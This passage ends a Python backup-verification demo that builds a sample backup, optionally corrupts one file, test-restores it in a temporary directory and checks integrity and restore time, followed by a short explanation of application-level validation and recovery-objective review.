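        "recoverable": not missing and not mismatched and elapsed <= rto_seconds,
    }


def run_demo(corrupt: Optional[str] = None) -> dict:
    """Build a constructed backup (optionally damaged) and test-restore it."""
    with tempfile.TemporaryDirectory(prefix="backup-src-") as d:
        dest = Path(d)
        archive = make_constructed_backup(dest, SAMPLE_FILES, corrupt)
        return verify_restore(archive, dest / "manifest.json")


if __name__ == "__main__":
    print("intact backup:", run_demo())
    print("damaged backup:", run_demo(corrupt="notes.txt"))
```

For a real file share the integrity check would be followed by the application-level validation the question asks for (open the database, run the reports, log in as a test user), and the measured restore time feeds the recovery-objective review; the isolated directory is what keeps the exercise from touching production.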
